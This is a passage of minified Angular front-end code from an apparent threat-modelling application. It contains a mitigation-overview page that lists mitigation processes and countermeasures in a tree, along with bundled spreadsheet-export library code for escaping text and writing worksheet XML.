.legend-label-text{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.chartDark[_ngcontent-%COMP%]     .ngx-charts text{fill:#fff!important}"]}),t})(),_2t=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,ff,f2t,AZ,S7]}),t})();function g2t(t,a){if(1&t&&(m(0,"h2"),s(1),u()),2&t){const e=B();C(1),ke(e.selectedNode.name())}}function C2t(t,a){if(1&t){const e=Ye();m(0,"app-mitigation-process",13),he("countermeasuresChange",function(){return be(e),Me(B().OnMappingProcessChange())}),u()}2&t&&V("mitigationProcess",B().selectedNode.data)}function y2t(t,a){if(1&t){const e=Ye();m(0,"app-countermeasure",14),he("mitigationProcessChange",function(){return be(e),Me(B().OnMappingProcessChange())}),u()}2&t&&V("countermeasure",B().selectedNode.data)}function b2t(t,a){if(1&t&&(m(0,"option",23),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ke(re(2,2,i.GetMitigationProcessStateName(e)))}}function M2t(t,a){if(1&t){const e=Ye();m(0,"select",21),he("ngModelChange",function(n){return be(e),Me(B().$implicit.data.MitigationProcessState=n)}),s(1,"\n                        "),ne(2,b2t,3,4,"option",22),s(3,"\n                      "),u()}if(2&t){const e=B().$implicit,i=B(2);V("ngModel",e.data.MitigationProcessState),C(2),V("ngForOf",i.GetMitigationProcessStates())}}function v2t(t,a){1&t&&it(0,"mat-progress-bar",24),2&t&&V("value",B().$implicit.data.Progress)}function A2t(t,a){if(1&t&&(bt(0),s(1),m(2,"span",25),s(3,"/"),u(),s(4),oe(5,"translate"),Mt()),2&t){const e=B().$implicit,i=B(2);C(1),ke(i.GetCheckedTasks(e.data.Tasks)),C(3),za("",e.data.Tasks.length," ",re(5,3,"general.Tasks"),"")}}function T2t(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),za("",e.data.Notes.length," ",re(2,2,"general.Notes"),"")}}function E2t(t,a){if(1&t&&(m(0,"option",23),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ke(re(2,2,i.GetMitigationStateName(e)))}}function D2t(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n                    "),m(2,"td")(3,"mat-icon"),s(4,"remove"),u()(),s(5,"\n                    "),m(6,"td"),s(7),u(),s(8,"\n                    "),m(9,"td",16),s(10,"\n                      "),m(11,"select",21),he("ngModelChange",function(n){return Me(be(e).$implicit.data.MitigationState=n)}),s(12,"\n                        "),ne(13,E2t,3,4,"option",22),s(14,"\n                      "),u(),s(15,"\n                    "),u(),s(16,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(3);C(7),ke(e.name()),C(4),V("ngModel",e.data.MitigationState),C(2),V("ngForOf",i.GetMitigationStates())}}function x2t(t,a){if(1&t&&(bt(0),s(1,"\n                  "),m(2,"tr"),s(3,"\n                    "),m(4,"td")(5,"mat-icon"),s(6,"arrow_right"),u()(),s(7,"\n                    "),m(8,"td"),s(9),u(),s(10,"\n                    "),m(11,"td",16),s(12,"\n                      "),ne(13,M2t,4,2,"select",17),s(14,"\n                    "),u(),s(15,"\n                    "),m(16,"td"),ne(17,v2t,1,1,"mat-progress-bar",18),u(),s(18,"\n                    "),m(19,"td",16),ne(20,A2t,6,5,"ng-container",10),u(),s(21,"\n                    "),m(22,"td"),ne(23,T2t,3,4,"ng-container",10),u(),s(24,"\n                  "),u(),s(25,"\n                  "),ne(26,D2t,17,3,"tr",15),s(27,"\n                  "),m(28,"tr",19),it(29,"td",20),u(),s(30,"\n                "),Mt()),2&t){const e=a.$implicit;C(9),ke(e.name()),C(4),V("ngIf",e.data),C(4),V("ngIf",e.data),C(3),V("ngIf",e.data),C(3),V("ngIf",e.data),C(3),V("ngForOf",e.children)}}function w2t(t,a){if(1&t&&(bt(0),s(1,"\n              "),m(2,"table"),s(3,"\n                "),ne(4,x2t,31,6,"ng-container",15),s(5,"\n              "),u(),s(6,"\n            "),Mt()),2&t){const e=B();C(4),V("ngForOf",e.selectedNode.children)}}Ds(Cf,[Zi,Ri,pm,_m,Ed,Ta,Ea,Zh,Dp,oa,da,Xa,xl,Xo,qo,po,el,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,Cp,al,bp,hA,SZ],[Xi]);const I2t=[{path:"mitigation",component:(()=>{class t extends CT{constructor(e,i,n,r,c,d){super(),this.theme=e,this.dataService=i,this.translate=n,this.locStorage=r,this.dialog=c,this.router=d,this.dataService.Project||this.router.navigate(["/home"],{queryParams:{origin:"mitigation"}})}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e}ngOnInit(){setTimeout(()=>{this.createNodes(),this.selectedNode=this.nodes[0]},100)}IsProcess(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Lp}IsMapping(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Jl}OnMappingProcessChange(){let e=this.selectedNode.data;e&&(this.createNodes(),this.selectedNode=xa.FindNodeOfObject(e,this.nodes))}GetCheckedTasks(e){return e.filter(i=>i.IsChecked).length}GetMitigationProcessStates(){return C2.GetMitigationStates()}GetMitigationProcessStateName(e){return C2.ToString(e)}GetMitigationStates(){return Sl.GetMitigationStates()}GetMitigationStateName(e){return Sl.ToString(e)}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_MITIGATION_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_MITIGATION_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes))}createNodes(){const e=this.nodes;this.nodes=[];const i=this.dataService.Project,n=(k,q)=>{let Y={name:()=>"CM"+k.Number+") "+k.Name,canSelect:!0,data:k,canRename:!1,canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(k).subscribe(te=>{te&&(i.DeleteCountermeasure(k),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},canMoveUpDown:!0,onMoveUp:()=>{var te;let pe=i.GetCountermeasures(),Re=null===(te=q.children)||void 0===te?void 0:te.map(Ne=>Ne.data),Fe=Re.findIndex(Ne=>Ne.ID==k.ID);if(0!=Fe){let Ne=pe.findIndex(et=>et.ID==Re[Fe-1].ID);i.MoveItemCountermeasures(pe.findIndex(et=>et.ID==k.ID),Ne),q.children.splice(Fe,0,q.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{var te;let pe=i.GetCountermeasures(),Re=null===(te=q.children)||void 0===te?void 0:te.map(Ne=>Ne.data),Fe=Re.findIndex(Ne=>Ne.ID==k.ID);if(Fe!=Re.length-1){let Ne=pe.findIndex(et=>et.ID==Re[Fe+1].ID);i.MoveItemCountermeasures(pe.findIndex(et=>et.ID==k.ID),Ne),q.children.splice(Fe,0,q.children.splice(Fe+1,1)[0])}}};return Y},r=(k,q)=>{let Y={name:()=>"MP"+k.Number+") "+k.Name,canSelect:!0,data:k,canRename:!1,canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(k).subscribe(te=>{te&&(i.DeleteMitigationProcess(k),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},canMoveUpDown:!0,onMoveUp:()=>{let te=i.GetMitigationProcesses();const pe=te.findIndex(Re=>Re.ID==k.ID);if(0!=pe){te.splice(pe,0,te.splice(pe-1,1)[0]);const Re=q.children.findIndex(Fe=>Fe.data==k);q.children.splice(Re,0,q.children.splice(Re-1,1)[0])}},onMoveDown:()=>{let te=i.GetMitigationProcesses();const pe=te.findIndex(Re=>Re.ID==k.ID);if(pe!=te.length-1){te.splice(pe,0,te.splice(pe+1,1)[0]);const Re=q.children.findIndex(Fe=>Fe.data==k);q.children.splice(Re,0,q.children.splice(Re+1,1)[0])}},children:[]};return i.GetCountermeasures().filter(te=>te.MitigationProcess==k).forEach(te=>Y.children.push(n(te,Y))),Y},c={name:()=>this.translate.instant("pages.modeling.mitigationoverview.MitigationProcesses"),icon:"security",canSelect:!0,canAdd:!0,hasMenu:!0,onAdd:()=>{let k=i.CreateMitigationProcess();this.createNodes(),this.selectedNode=xa.FindNodeOfObject(k,this.nodes),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)},children:[]},d={name:()=>this.translate.instant("pages.modeling.mitigationoverview.NotAssignedCountermeasures"),canSelect:!1,children:[]};i.GetCountermeasuresApplicable().filter(k=>null==k.MitigationProcess).forEach(k=>d.children.push(n(k,d))),d.children.length>0&&c.children.push(d);const T={name:()=>this.translate.instant("pages.modeling.mitigationoverview.RejectedCountermeasures"),canSelect:!1,children:[],isExpanded:!1};i.GetCountermeasuresNotApplicable().filter(k=>null==k.MitigationProcess).forEach(k=>T.children.push(n(k,T))),T.children.length>0&&c.children.push(T),i.GetMitigationProcesses().forEach(k=>c.children.push(r(k,c))),this.nodes.push(c),xa.TransferExpandedState(e,this.nodes),this.navTree.SetNavTreeData(this.nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Sn),Ee(_r),Ee(Wn),Ee(Oo))},t.\u0275cmp=Wt({type:t,selectors:[["app-mitigation-overview"]],features:[ci],decls:39,vars:24,consts:[[1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/mitigation",2,"width","100%","height","100%",3,"sameRoute"],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[3,"size","visible","order"],[3,"activeNode","selectedNodeChanged"],["navTree",""],[3,"size","order"],[2,"margin","10px"],[4,"ngIf"],["style","height: 100%;",3,"mitigationProcess","countermeasuresChange",4,"ngIf"],["style","height: 100%;",3,"countermeasure","mitigationProcessChange",4,"ngIf"],[2,"height","100%",3,"mitigationProcess","countermeasuresChange"],[2,"height","100%",3,"countermeasure","mitigationProcessChange"],[4,"ngFor","ngForOf"],[2,"padding","0 10px"],["style","width: 130px;",3,"ngModel","ngModelChange",4,"ngIf"],["class","disable","color","primary","style","width: 100px; margin-right: 3px;",3,"value",4,"ngIf"],[2,"height","20px"],["colspan","6"],[2,"width","130px",3,"ngModel","ngModelChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["color","primary",1,"disable",2,"width","100px","margin-right","3px",3,"value"],[2,"letter-spacing","2px"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),m(6,"app-side-nav",3),he("sameRoute",function(){return i.OnSameRoute()}),u(),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),m(11,"as-split",4),he("dragEnd",function(r){return i.OnSplitSizeChange(r,1)}),s(12,"\n        "),m(13,"as-split-area",5),s(14,"\n          "),m(15,"app-nav-tree",6,7),he("selectedNodeChanged",function(r){return i.selectedNode=r}),u(),s(17,"\n        "),u(),s(18,"\n        "),m(19,"as-split-area",8),s(20,"\n          "),m(21,"div",9),s(22,"\n            "),ne(23,g2t,2,1,"h2",10),s(24,"\n            "),ne(25,C2t,1,1,"app-mitigation-process",11),s(26,"\n            "),ne(27,y2t,1,1,"app-countermeasure",12),s(28,"\n            "),ne(29,w2t,7,1,"ng-container",10),s(30,"\n          "),u(),s(31,"\n        "),u(),s(32,"\n      "),u(),s(33,"\n    "),u(),s(34,"\n  "),u(),s(35,"\n  "),it(36,"app-status-bar"),s(37,"\n"),u(),s(38,"\n")),2&e&&(C(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),C(2),V("gutterSize",3)("restrictMove",!0),C(2),Ct("splitter-light1",!i.theme.IsDarkMode)("splitter-dark1",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,0,350))("visible",i.showLeftBar)("order",1),C(2),V("activeNode",i.selectedNode),C(4),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,1,"*"))("order",2),C(4),V("ngIf",i.selectedNode),C(2),V("ngIf",i.IsProcess()),C(2),V("ngIf",i.IsMapping()),C(2),V("ngIf",i.selectedNode&&null==i.selectedNode.data))},dependencies:[Zi,Ri,pm,_m,Ed,Ta,Ea,Zh,Dp,oa,_u,gu,Nd,hA,pf,_f,df,cM,_T,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})()}];let R2t=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Ms.forChild(I2t),Ms]}),t})(),S2t=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,ff,R2t,k7]}),t})();var ua=de(4594),k2t=de(5818),P2t=de.n(k2t),O2t=de(7040);function kZ(t,a){var e=a.attribute;return t=t.replace(F2t,"&amp;").replace(V2t,"&gt;").replace(B2t,"&lt;"),e&&(t=t.replace(H2t,"&apos;").replace(U2t,"&quot;")),t}var F2t=/&/g,V2t=/>/g,B2t=/</g,H2t=/'/g,U2t=/"/g,q2t=/((?:[\0-\x08\x0B\f\x0E-\x1F\uFFFD\uFFFE\uFFFF]|[\uD800-\uDBFF](?![\uDC00-\uDFFF])|(?:[^\uD800-\uDBFF]|^)[\uDC00-\uDFFF]))/g,G2t=new RegExp("([\\x7F-\\x84]|[\\x86-\\x9F]|[\\uFDD0-\\uFDEF]|(?:\\uD83F[\\uDFFE\\uDFFF])|(?:\\uD87F[\\uDFFE\\uDFFF])|(?:\\uD8BF[\\uDFFE\\uDFFF])|(?:\\uD8FF[\\uDFFE\\uDFFF])|(?:\\uD93F[\\uDFFE\\uDFFF])|(?:\\uD97F[\\uDFFE\\uDFFF])|(?:\\uD9BF[\\uDFFE\\uDFFF])|(?:\\uD9FF[\\uDFFE\\uDFFF])|(?:\\uDA3F[\\uDFFE\\uDFFF])|(?:\\uDA7F[\\uDFFE\\uDFFF])|(?:\\uDABF[\\uDFFE\\uDFFF])|(?:\\uDAFF[\\uDFFE\\uDFFF])|(?:\\uDB3F[\\uDFFE\\uDFFF])|(?:\\uDB7F[\\uDFFE\\uDFFF])|(?:\\uDBBF[\\uDFFE\\uDFFF])|(?:\\uDBFF[\\uDFFE\\uDFFF])(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF]))","g");function PZ(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},e=a.removeDiscouragedCharacters,i=void 0===e||e;return t=t.replace(q2t,""),i&&(t=t.replace(G2t,"")),t}function OZ(t){return kZ(PZ(t),{attribute:!1})}function XT(t,a){return"".concat(LZ(t)).concat(a)}function LZ(t){if("number"!=typeof t)return"";var a=Math.floor(t/26),e=String.fromCharCode(97+t%26).toUpperCase();return 0===a?e:LZ(a-1)+e}function zZ(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}function tCt(t,a,e,i,n,r){if(null===e&&!n)return"";var c='<c r="'.concat(XT(a,t),'"');if(n&&(c+=' s="'.concat(n,'"')),null===e)return c+"/>";if(i===Date&&!n)throw new Error('No "format" has been specified for a Date cell');e=function aCt(t,a,e){switch(t){case String:if("string"!=typeof a)throw new Error("Invalid cell value: ".concat(a,". Expected a string"));return e(a);case Number:if("number"!=typeof a)throw new Error("Invalid cell value: ".concat(a,". Expected a number"));return String(a);case Date:if(!(a instanceof Date))throw new Error("Invalid cell value: ".concat(a,". Expected a Date"));return String(function K2t(t){return t.getTime()/864e5+25569}(a));case Boolean:if("boolean"!=typeof a)throw new Error("Invalid cell value: ".concat(a,". Expected a boolean"));return a?"1":"0";case"Formula":if("string"!=typeof a)throw new Error("Invalid cell value: ".concat(a,". Expected a string"));return OZ(a);default:throw new Error("Unknown schema type: ".concat(t&&t.name||t))}}(i,e,r),i=function iCt(t){switch(t){case String:return"s";case Number:case Date:return;case Boolean:return"b";case"Formula":return"f";default:throw new Error("Unknown schema type: ".concat(t&&t.name||t))}}(i),i&&(c+=' t="'.concat(i,'"'));var d=function oCt(t){var a=function rCt(t){switch(t){case"inlineStr":return"<is><t>";case"f":return"<f>";default:return"<v>"}}(t),e=a.replace(nCt,"</");return[a,e]}(i),T=function X2t(t,a){return function eCt(t){if(Array.isArray(t))return t}(t)||function Z2t(t,a){var e=null==t?null:"undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(null!=e){var c,d,i=[],n=!0,r=!1;try{for(e=e.call(t);!(n=(c=e.next()).done)&&(i.push(c.value),!a||i.length!==a);n=!0);}catch(T){r=!0,d=T}finally{try{!n&&null!=e.return&&e.return()}finally{if(r)throw d}}return i}}(t,a)||function J2t(t,a){if(t){if("string"==typeof t)return zZ(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return zZ(t,a)}}(t,a)||function Y2t(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}(d,2);return c+">"+T[0]+e+T[1]+"</c>"}var nCt=/</g;function WZ(t){var a=t.align,e=t.alignVertical,i=t.fontFamily,n=t.fontSize,r=t.fontWeight,c=t.fontStyle,d=t.wrap,T=t.color,k=t.backgroundColor,q=t.borderColor,Y=t.borderStyle,te=t.leftBorderColor,pe=t.leftBorderStyle,Re=t.rightBorderColor,Fe=t.rightBorderStyle,Ne=t.topBorderColor,et=t.topBorderStyle,ut=t.bottomBorderColor,Ze=t.bottomBorderStyle;if(a||e||i||n||r||c||d||T||k||q||Y||te||pe||Re||Fe||Ne||et||ut||Ze)return function sCt(t){var a={};for(var e in t)void 0!==t[e]&&(a[e]=t[e]);return a}({align:a,alignVertical:e,fontFamily:i,fontSize:n,fontWeight:r,fontStyle:c,wrap:d,color:T,backgroundColor:k,borderColor:q,borderStyle:Y,leftBorderColor:te,leftBorderStyle:pe,rightBorderColor:Re,rightBorderStyle:Fe,topBorderColor:Ne,topBorderStyle:et,bottomBorderColor:ut,bottomBorderStyle:Ze})}function P7(t){return(P7="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(a){return typeof a}:function(a){return a&&"function"==typeof Symbol&&a.constructor===Symbol&&a!==Symbol.prototype?"symbol":typeof a})(t)}function FZ(t,a){var e=Object.keys(t);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(t);a&&(i=i.filter(function(n){return Object.getOwnPropertyDescriptor(t,n).enumerable})),e.push.apply(e,i)}return e}function O7(t){for(var a=1;a<arguments.length;a++){var e=null!=arguments[a]?arguments[a]:{};a%2?FZ(Object(e),!0).forEach(function(i){mCt(t,i,e[i])}):Object.getOwnPropertyDescriptors?Object.defineProperties(t,Object.getOwnPropertyDescriptors(e)):FZ(Object(e)).forEach(function(i){Object.defineProperty(t,i,Object.getOwnPropertyDescriptor(e,i))})}return t}function mCt(t,a,e){return a in t?Object.defineProperty(t,a,{value:e,enumerable:!0,configurable:!0,writable:!0}):t[a]=e,t}function VZ(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}var pCt={fontWeight:"bold"};function gCt(t,a){if(!t||(t.type===Date&&!t.width&&(t.width=14),!t.width))return"";var e=a+1;return'<col min="'.concat(e,'" max="').concat(e,'" width="').concat(t.width,'" customWidth="1"/>')}function bCt(t){var a=t.data,e=t.rowIndex,i=t.columnIndex,n=t.span,r=t.rowSpan,c=t.cloneData,d=WZ(a[e][i]);d&&(a=c());for(var T=e;T<=e+(r-1);){for(var k=i;k<=i+(n-1);){var q=a[T][k];if(T>e||k>i){if(null!=q)throw new Error("[write-excel-file] When using `span` or `rowSpan` parameters, all hidden overlapped cells should be represented by `null`s or `undefined`s. Cell at row ".concat(e+1," and column ").concat(i+1," is configured with `span` ").concat(n," and `rowSpan` ").concat(r,". Cell at row ").concat(T+1," and column ").concat(k+1," is neither `null` nor `undefined`: ").concat(JSON.stringify(q)));d&&(a[T][k]=d)}k++}T++}}function BZ(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}function yf(t){return kZ(PZ(t),{attribute:!0})}function RCt(t,a){var e=a.schema,i=a.columns,n=a.headerStyle,r=a.getStyle,c=a.getSharedString,d=a.customFont,T=a.dateFormat,k=a.orientation,q=a.stickyRowsCount,Y=a.stickyColumnsCount,te=a.sheetId;!function SCt(t,a){if(a.schema){if(!Array.isArray(t))throw new TypeError("Expected an array of objects")}else{if(!Array.isArray(t))throw new TypeError("Expected an array of arrays");if(t.length>0&&!Array.isArray(t[0]))throw new TypeError("Expected an array of arrays")}}(t,{schema:e});var pe=function yCt(t,a){var i=[];if(a.schema)return{data:t,mergedCells:i};for(var n=function(){t=t.slice();for(var Re=0;Re<t.length;)t[Re]=t[Re].slice(),Re++;return n=function(){return t},t},r=0;r<t.length;){for(var c=t[r],d=0;d<c.length;){var T=c[d];if(T){var k=T.span,q=void 0===k?1:k,Y=T.rowSpan,te=void 0===Y?1:Y;(q>1||te>1)&&(bCt({data:t,rowIndex:r,columnIndex:d,span:q,rowSpan:te,cloneData:n}),i.push([[r,d],[r+(te?te-1:0),d+(q?q-1:0)]]))}d++}r++}return{data:t,mergedCells:i}}(t,{schema:e}),Fe=pe.mergedCells;return'<?xml version="1.0" ?>\n<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:mx="http://schemas.microsoft.com/office/mac/excel/2008/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">{views}{columnsDescription}<sheetData>{data}</sheetData>{mergedCellsDescription}{layout}</worksheet>'.replace("{data}",function fCt(t,a){var e=a.schema,i=a.headerStyle,n=a.getStyle,r=a.getSharedString,c=a.customFont,d=a.dateFormat;if(e){for(var q,T=[],k=function uCt(t,a){var e="undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(e)return(e=e.call(t)).next.bind(e);if(Array.isArray(t)||(e=function hCt(t,a){if(t){if("string"==typeof t)return VZ(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return VZ(t,a)}}(t))||a&&t&&"number"==typeof t.length){e&&(t=e);var i=0;return function(){return i>=t.length?{done:!0}:{done:!1,value:t[i++]}}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}(e);!(q=k()).done;)if(q.value.column){T=[e.map(function(te){return 